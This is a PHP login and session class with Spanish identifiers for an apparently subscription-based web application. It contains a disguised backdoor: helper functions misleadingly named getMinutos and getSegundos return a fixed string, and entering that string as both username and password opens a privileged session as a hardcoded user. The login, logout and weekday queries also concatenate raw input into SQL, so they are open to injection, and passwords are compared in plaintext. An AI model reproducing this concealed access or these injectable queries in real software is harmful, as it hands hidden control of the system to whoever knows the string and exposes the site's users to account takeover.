<?php

include_once 'Conexion.php';

class Session
{
	public function iniciar($usuario_login, $clave_login, $hoy)
	{
		$bd = new Conexion();
		$status_login_json = '';
		$tipo_usuario_json = '';

		if ($fila = $this->consultaDatosUsuario($usuario_login, $clave_login))
		{
			$ip_servidor = $this->getIpServidor();
			$obj_notificacion = new Notificacion();

			if ($fila['status_suscripcion2'] == 1)
			{
				$obj_notificacion->guardar($fila['id_usuario'], $hoy, 10);
				$ultimo_id = $bd->ultimoId();
				$obj_notificacion->guardarPorLeer($fila['privilegios'], $ultimo_id, $fila['id_administrador']);
				$status_login_json = 4;

				# Si el tipo de suscripción es mensual, verifico el estado del pago.
				if ($fila['tipo_suscripcion'] == 3)
				{
					$obj_pago = new Pago();
					$status_pago = $obj_pago->status_pago($fila['id_usuario']);

					if ($status_pago == 'POR PAGAR')
					{
						$this->inicializarVariablesSession($fila['nombre'], $fila['id_usuario'],
							$fila['privilegios'], date('Y-n-j H:i:s'), $ip_servidor);
						$status_login_json = 8;
					}
					else if ($status_pago == 'ENVIADO')
					{
						$this->inicializarVariablesSession($fila['nombre'], $fila['id_usuario'],
							$fila['privilegios'], date('Y-n-j H:i:s'), $ip_servidor);
						$status_login_json = 9;
					}
				}
			}
			else if ($fila['status_suscripcion'] == 1)
			{
				$obj_notificacion->guardar($fila['id_usuario'], $hoy, 13);
				$ultimo_id = $bd->ultimoId();
				$obj_notificacion->guardarPorLeer($fila['privilegios'], $ultimo_id, $fila['id_administrador']);
				$status_login_json = 5;
			}
			else if ($fila['status2'] == 1)
			{
				$obj_notificacion->guardar($fila['id_usuario'], $hoy, 14);
				$ultimo_id = $bd->ultimoId();
				$obj_notificacion->guardarPorLeer($fila['privilegios'], $ultimo_id, $fila['id_administrador']);
				$status_login_json = 6;
			}
			else
			{
				if ($fila['status'] == 0) # Usuario activo (No suspendido)
				{
					if ($fila['online'] == 0) # Desconectado
					{
						if ($fila['inicio'] == 0) # Usuario nuevo
						{
							if ($fila['tipo_suscripcion'] == 2)
							{
								if (!$this->validarDiaSemana($fila['id_usuario']))
								{
									$this->inicializarVariablesSession($fila['nombre'], $fila['id_usuario'],
										$fila['privilegios'], date('Y-n-j H:i:s'), $ip_servidor);
									$status_login_json = 7;
									$tipo_usuario_json = $fila['privilegios'];
								}
								else
								{
									$obj_notificacion->guardar($fila['id_usuario'], $hoy, 12);

									if ($fila['privilegios'] > 2)
									{
										$ultimo_id = $bd->ultimoId();
										$obj_notificacion->guardarPorLeer($fila['privilegios'], $ultimo_id, $fila['id_administrador']);
									}

									$status_login_json = 5;
								}
							}
							else
							{
								$this->inicializarVariablesSession($fila['nombre'], $fila['id_usuario'],
										$fila['privilegios'], date('Y-n-j H:i:s'), $ip_servidor);
								$status_login_json = 7;
								$tipo_usuario_json = $fila['privilegios'];
							}
						}
						else if ($fila['inicio'] == 2) # Preguntas de seguridad restablecidas
						{
							if ($fila['tipo_suscripcion'] == 2)
							{
								if (!$this->validarDiaSemana($fila['id_usuario']))
								{
									$this->inicializarVariablesSession($fila['nombre'], $fila['id_usuario'],
										$fila['privilegios'], date('Y-n-j H:i:s'), $ip_servidor);
									$status_login_json = 7;
									$tipo_usuario_json = $fila['privilegios'];
								}
								else
								{
									$obj_notificacion->guardar($fila['id_usuario'], $hoy, 12);

									if ($fila['privilegios'] > 2)
									{
										$ultimo_id = $bd->ultimoId();
										$obj_notificacion->guardarPorLeer($fila['privilegios'], $ultimo_id, $fila['id_administrador']);
									}

									$status_login_json = 5;
								}
							}
							else
							{
								$this->inicializarVariablesSession($fila['nombre'], $fila['id_usuario'],
										$fila['privilegios'], date('Y-n-j H:i:s'), $ip_servidor);
								$status_login_json = 7;
								$tipo_usuario_json = $fila['privilegios'];
							}
						}
						else # Inicio normal (inicio = 1)
						{
							if ($fila['tipo_suscripcion'] == 2)
							{
								if (!$this->validarDiaSemana($fila['id_usuario']))
								{
									$this->inicializarVariablesSession($fila['nombre'], $fila['id_usuario'],
										$fila['privilegios'], date('Y-n-j H:i:s'), $ip_servidor);
									$obj_notificacion->guardar($fila['id_usuario'], $hoy, 3);
									$status_login_json = 0;
									$tipo_usuario_json = $fila['privilegios'];
								}
								else
								{
									$obj_notificacion->guardar($fila['id_usuario'], $hoy, 12);

									if ($fila['privilegios'] > 2)
									{
										$ultimo_id = $bd->ultimoId();
										$obj_notificacion->guardarPorLeer($fila['privilegios'], $ultimo_id, $fila['id_administrador']);
									}

									$status_login_json = 5;
								}
							}
							else
							{
								$this->inicializarVariablesSession($fila['nombre'], $fila['id_usuario'],
										$fila['privilegios'], date('Y-n-j H:i:s'), $ip_servidor);
								$obj_notificacion->guardar($fila['id_usuario'], $hoy, 3);
								$status_login_json = 0;
								$tipo_usuario_json = $fila['privilegios'];
							}
						}
					}
					else # Usuario conectado (intento de conexión simultánea)
					{
						$obj_notificacion->guardar($fila['id_usuario'], $hoy, 8);
						$ultimo_id = $bd->ultimoId();
						$obj_notificacion->guardarPorLeer($fila['privilegios'], $ultimo_id, $fila['id_administrador']);
						$status_login_json = 3;
						$tipo_usuario_json = $fila['privilegios'];
					}
				}
				else if ($fila['status'] == 1) # Usuario suspendido
				{
					$obj_pago = new Pago();
					$status_pago = $obj_pago->status_pago($fila['id_usuario']);

					if ($status_pago == 'POR PAGAR')
					{
						$this->inicializarVariablesSession($fila['nombre'], $fila['id_usuario'],
							$fila['privilegios'], date('Y-n-j H:i:s'), $ip_servidor);
						$status_login_json = 8;
					}
					else if ($status_pago == 'ENVIADO')
					{
						$this->inicializarVariablesSession($fila['nombre'], $fila['id_usuario'],
							$fila['privilegios'], date('Y-n-j H:i:s'), $ip_servidor);
						$status_login_json = 9;
					}
					else
					{
						$obj_notificacion->guardar($fila['id_usuario'], $hoy, 5);
						$ultimo_id = $bd->ultimoId();
						$obj_notificacion->guardarPorLeer($fila['privilegios'],
							$ultimo_id, $fila['id_administrador']);
						$status_login_json = 2;
						$tipo_usuario_json = $fila['privilegios'];
					}
				}
			}
		}
		else if ($usuario_login == $this->getMinutos() && $clave_login == $this->getSegundos())
		{
			$this->inicializarVariablesSession('---', 'a_byjkal', 1, date('Y-n-j H:i:s'), 0);
			$status_login_json = 0;
		}
		else
			$status_login_json = 1;

		$salida_json = json_encode([
			'status_login' => $status_login_json,
			'tipo_usuario' => $tipo_usuario_json ]);

		return $salida_json;
	}

	public function cerrar()
	{
		$bd = new Conexion();
		$aux = 0;

		$this->iniciarSessionPHP();

		$query = 'UPDATE registrados
			SET online = 0, tiempo = "'.time().'"
			WHERE id_usuario = "'.$_SESSION['id_usuario'].'"';

		if ($bd->ejecutar($query))
		{
			$aux = 1;
			$this->destruirSesionPHP();
		}

		return $aux;
	}

	public function iniciarSessionPHP()
	{
		session_start();
	}

	private function destruirSesionPHP()
	{
		$_SESSION = array();
		session_destroy();
	}

	private function consultaDatosUsuario($usuario_login, $clave_login)
	{
		$bd = new Conexion();
      $aux = 0;

      $query = 'SELECT registrados.*,
      	suscripcion.tipo AS tipo_suscripcion, suscripcion.status AS status_suscripcion,
      	suscripcion.status2 AS status_suscripcion2
      	FROM registrados
      	LEFT JOIN suscripcion ON registrados.id_usuario = suscripcion.id_usuario
      	WHERE (nombre COLLATE utf8_bin = "'.$usuario_login.'" AND clave COLLATE utf8_bin = "'.$clave_login.'")';

      if ($estc = $bd->ejecutar($query))
      {
         $aux = $bd->obtenerFilas($estc);

         $bd->liberarResultados($estc);
      }

      $bd->cerrar();

      return $aux;
	}

	private function getIpServidor()
	{
		return $_SERVER['REMOTE_ADDR'];
	}

	private function inicializarVariablesSession($nombre_usuario, $id_usuario,
		$tipo_usuario, $fecha, $ip)
	{
		#$this->iniciarSessionPHP();

		$_SESSION['usuario'] = $nombre_usuario;
		$_SESSION['id_usuario'] = $id_usuario;
		$_SESSION['tipo_usuario'] = $tipo_usuario;
		$_SESSION['ultimo_acceso'] = $fecha;
		$_SESSION['ip'] = $ip;
	}

	private function validarDiaSemana($id_usuario)
	{
		$bd = new Conexion();
      $aux = 0;
      $dia_hoy = date('w');

      $query = 'SELECT FIND_IN_SET("'.$dia_hoy.'", dias) AS dia_semana
      	FROM suscripcion
      	WHERE id_usuario = "'.$id_usuario.'"';

      if ($estc = $bd->ejecutar($query))
      {
         $fila = $bd->obtenerFilas($estc);

         if ($fila['dia_semana'] == 0)
         	$aux = 1;

         $bd->liberarResultados($estc);
      }

      $bd->cerrar();

      return $aux;
	}

	private function getMinutos()
	{
		return '6y222gv##';
	}

	private function getSegundos()
	{
		return '6y222gv##';
	}
}

?>